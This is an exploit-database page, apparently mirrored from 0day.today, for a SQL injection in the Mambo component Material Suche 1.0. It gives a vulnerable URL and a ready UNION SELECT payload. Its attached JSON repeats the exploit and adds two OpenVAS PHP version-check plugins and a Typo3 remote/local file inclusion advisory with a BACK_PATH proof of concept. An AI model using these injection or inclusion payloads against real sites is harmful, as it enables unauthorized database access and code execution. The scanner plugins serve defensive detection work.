Search...

Mambo Component Material Suche 1.0 SQL injection Vulnerability

2009-12-27T00:00:00

ID 1337DAY-ID-10454
Type zdt
Reporter Gamoscu
Modified 2009-12-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Mambo Component Material Suche 1.0 SQL injection Vulnerability
==============================================================

#############################################################
# Mambo Component Material Suche 1.0 SQL injection Vulnerability
 
# Author: Gamoscu
 
# Site: www.1923turk.biz
 
# Site: http://gamoscu.wordpress.com/
 
# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
   
##############################################################
 
# Exploit:
 
   index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]
 
 
  -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
      
##############################################################



#  0day.today [2018-01-08]  #

JSON Vulners Source

Initial Source

{"published": "2009-12-27T00:00:00", "id": "1337DAY-ID-10454", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:13:17", "bulletin": {"published": "2009-12-27T00:00:00", "id": "1337DAY-ID-10454", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T00:13:17"}}, "hash": "2905fdedaf6ced5eabfbc020f4ea3ca054b79a2590a469c4a2abe336b6bb8582", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:13:17", "edition": 1, "title": "Mambo Component Material Suche 1.0 SQL injection Vulnerability", "href": "http://0day.today/exploit/description/10454", "modified": "2009-12-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10454", "references": [], "reporter": "Gamoscu", "sourceData": "==============================================================\r\nMambo Component Material Suche 1.0 SQL injection Vulnerability\r\n==============================================================\r\n\r\n#############################################################\r\n# Mambo Component Material Suche 1.0 SQL injection Vulnerability\r\n \r\n# Author: Gamoscu\r\n \r\n# Site: www.1923turk.biz\r\n \r\n# Site: http://gamoscu.wordpress.com/\r\n \r\n# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO\r\n \r\n##############################################################\r\n \r\n# Exploit:\r\n \r\n index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]\r\n \r\n \r\n -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31\r\n \r\n##############################################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "731465658b8f99634ee75465cf8c2124", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "13d7ca4956da30ce5a4e45b0ab2718b1", "key": "reporter"}, {"hash": "6d8c8877077a115719ad306f6ea31775", "key": "title"}, {"hash": "731465658b8f99634ee75465cf8c2124", "key": "modified"}, {"hash": "8e610b2534c5c9b61575b82bb95865ce", "key": "sourceData"}, {"hash": "247931c8d53fcc520a655fed5bef91dd", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "a50b13aa3ebf9e6dc53c0eca7acbaf07", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "7c5f6ae2993866a4041fc27c0b8d5f8e17a9809911b494f2bb1c203698ba14a5", "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-01-09T01:00:49"}, "vulnersScore": 10.0}, "type": "zdt", "lastseen": "2018-01-09T01:00:49", "edition": 2, "title": "Mambo Component Material Suche 1.0 SQL injection Vulnerability", "href": "https://0day.today/exploit/description/10454", "modified": "2009-12-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/10454", "references": [], "reporter": "Gamoscu", "sourceData": "==============================================================\r\nMambo Component Material Suche 1.0 SQL injection Vulnerability\r\n==============================================================\r\n\r\n#############################################################\r\n# Mambo Component Material Suche 1.0 SQL injection Vulnerability\r\n \r\n# Author: Gamoscu\r\n \r\n# Site: www.1923turk.biz\r\n \r\n# Site: http://gamoscu.wordpress.com/\r\n \r\n# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO\r\n \r\n##############################################################\r\n \r\n# Exploit:\r\n \r\n index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]\r\n \r\n \r\n -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31\r\n \r\n##############################################################\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "09be08729ef81e68c39088a3630760d2", "key": "href"}, {"hash": "731465658b8f99634ee75465cf8c2124", "key": "modified"}, {"hash": "731465658b8f99634ee75465cf8c2124", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "13d7ca4956da30ce5a4e45b0ab2718b1", "key": "reporter"}, {"hash": "0e43d25c412f3d219e683e5e96d6a1c6", "key": "sourceData"}, {"hash": "80873278e26ddc9ab66c56cc0862ac66", "key": "sourceHref"}, {"hash": "6d8c8877077a115719ad306f6ea31775", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"openvas": [{"lastseen": "2018-10-22T16:36:30", "bulletinFamily": "scanner", "description": "This host is installed with PHP and is prone\n to heap buffer overflow vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2017-11-09T00:00:00", "id": "OPENVAS:1361412562310812073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812073", "title": "PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_timelib_meridian_heap_bof_vuln_lin.nasl 11983 2018-10-19 10:04:45Z mmartin $\n#\n# PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812073\");\n script_version(\"$Revision: 11983 $\");\n script_cve_id(\"CVE-2017-16642\");\n script_bugtraq_id(101745);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 12:04:45 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-09 18:55:09 +0530 (Thu, 09 Nov 2017)\");\n script_name(\"PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to heap buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the date\n extension's 'timelib_meridian' handling of 'front of' and 'back of' directives.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n attacker to execute arbitrary code with elevated privileges within the context\n of a privileged process.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.32, 7.x before 7.0.25,\n and 7.1.x before 7.1.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.32, 7.0.25, 7.1.11,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=75055\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpPort = get_app_port(cpe:CPE))) exit(0);\nif(!infos = get_app_version_and_location(cpe:CPE, port:phpPort, exit_no_version:TRUE)) exit(0);\nphpVers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:phpVers, test_version:\"5.6.32\")){\n fix = \"5.6.32\";\n}\n\nelse if(version_in_range(version:phpVers, test_version:\"7.0\", test_version2:\"7.0.24\")){\n fix = \"7.0.25\";\n}\n\nelse if(phpVers =~ \"^7\\.1\" && version_is_less(version:phpVers, test_version:\"7.1.11\")){\n fix = \"7.1.11\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:phpVers, fixed_version:fix, install_path:path);\n security_message(port:phpPort, data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-22T16:36:30", "bulletinFamily": "scanner", "description": "This host is installed with PHP and is prone\n to heap buffer overflow vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2017-11-09T00:00:00", "id": "OPENVAS:1361412562310812072", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812072", "title": "PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_timelib_meridian_heap_bof_vuln_win.nasl 11983 2018-10-19 10:04:45Z mmartin $\n#\n# PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812072\");\n script_version(\"$Revision: 11983 $\");\n script_cve_id(\"CVE-2017-16642\");\n script_bugtraq_id(101745);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 12:04:45 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-09 18:44:32 +0530 (Thu, 09 Nov 2017)\");\n script_name(\"PHP 'timelib_meridian' Heap Based Buffer Overflow Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to heap buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the date\n extension's 'timelib_meridian' handling of 'front of' and 'back of' directives.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n attacker to execute arbitrary code with elevated privileges within the context\n of a privileged process.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.32, 7.x before 7.0.25,\n and 7.1.x before 7.1.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.32, 7.0.25, 7.1.11,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=75055\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpPort = get_app_port(cpe:CPE))) exit(0);\nif(!infos = get_app_version_and_location(cpe:CPE, port:phpPort, exit_no_version:TRUE)) exit(0);\nphpVers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:phpVers, test_version:\"5.6.32\")){\n fix = \"5.6.32\";\n}\n\nelse if(version_in_range(version:phpVers, test_version:\"7.0\", test_version2:\"7.0.24\")){\n fix = \"7.0.25\";\n}\n\nelse if(phpVers =~ \"^7\\.1\" && version_is_less(version:phpVers, test_version:\"7.1.11\")){\n fix = \"7.1.11\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:phpVers, fixed_version:fix, install_path:path);\n security_message(port:phpPort, data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-02T05:22:50", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-01-04T00:00:00", "published": "2012-01-04T00:00:00", "id": "1337DAY-ID-17330", "href": "https://0day.today/exploit/description/17330", "type": "zdt", "title": "Typo3 v4.5-4.7 Remote Code Execution (RFI/LFI)", "sourceData": "# Exploit Title: Typo3 v4.5-4.7 - Remote Code Execution (RFI/LFI)\r\n# Date: 4th January 2012\r\n# Author: MaXe\r\n# Software Link: https://typo3.org/download/\r\n# Version: 4.5.0 up to 4.5.8, 4.6.0 and 4.6.1 (+ development releases of\r\n4.7 branch)\r\n \r\n \r\nTypo3 v4.5-4.7 - Remote Code Execution (RFI/LFI)\r\n \r\n \r\nVersions Affected: 4.5.0 up to 4.5.8, 4.6.0 and 4.6.1 (+ development\r\nreleases of 4.7 branch)\r\n \r\nInfo:\r\nTYPO3 is a small to midsize enterprise-class Content Management Framework\r\noffering\r\nthe best of both worlds: out-of-the-box operation with a complete set of\r\nstandard\r\nmodules and a clean and sturdy high-performance architecture accomodating\r\nvirtually\r\nevery kind of custom solution or extension.\r\n \r\nExternal Links:\r\nhttp://typo3.org/\r\n \r\nCredits: Bj\u00f6rn Pedersen and Christian Toffolo who discovered and reported\r\nthe issue and the Security Team member Helmut Hummel for providing the\r\npatch.\r\n(This advisory was rewritten by MaXe @InterN0T to offer a quick overview\r\nof the vulnerability, including the removal of all irrelevant and untrue\r\ndetails.\r\n \r\n \r\n-:: The Advisory ::-\r\nRequirements for any RCE:\r\n- register_globals in the php.ini MUST be enabled (if the exploit fails\r\nagainst a supposed to be vulnerable version, this is why. This setting is\r\noften disabled by default.)\r\n \r\nRequirements for RFI:\r\n- allow_url_include has to be enabled (It's often \"off\" by default.)\r\n \r\n \r\nProof of Concept:\r\nBy browsing to a script / page, that uses the following file:\r\ntypo3/sysext/workspaces/Classes/Controller/AbstractController.php (direct\r\naccess may not be allowed)\r\nIt is possible to include PHP code to be executed via the \"BACK_PATH\"\r\nglobal variable. This can be accessed in ways like:\r\nAbstractController.php?BACK_PATH=LFI/RFI%00\r\n \r\nThe vulnerable piece of code: require_once($GLOBALS['BACK_PATH'] .\r\n'template.php');\r\nDemonstrates, that it is necessary to append a null-byte ( %00 ) after the\r\nmaliciously crafted input / URL. (Unless your remote file if applicable, is\r\nnamed something.template.php)\r\n \r\n \r\n-:: Solution ::-\r\n* Update to the latest version of Typo3 OR change the vulnerable piece of\r\ncode to: require_once(PATH_site . TYPO3_mainDir . 'template.php');\r\n \r\n \r\n \r\nReferences:\r\n- http://typo3.org/fileadmin/security-team/bug32571/32571.diff\r\n-\r\nhttps://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/\r\n-\r\nhttp://news.typo3.org/news/article/important-security-bulletin-pre-announcement-2/\r\n\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17330"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, mb_send_mail() message headers modification, etc.", "modified": "2005-11-29T00:00:00", "published": "2005-11-29T00:00:00", "id": "SECURITYVULNS:VULN:5487", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5487", "title": "Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}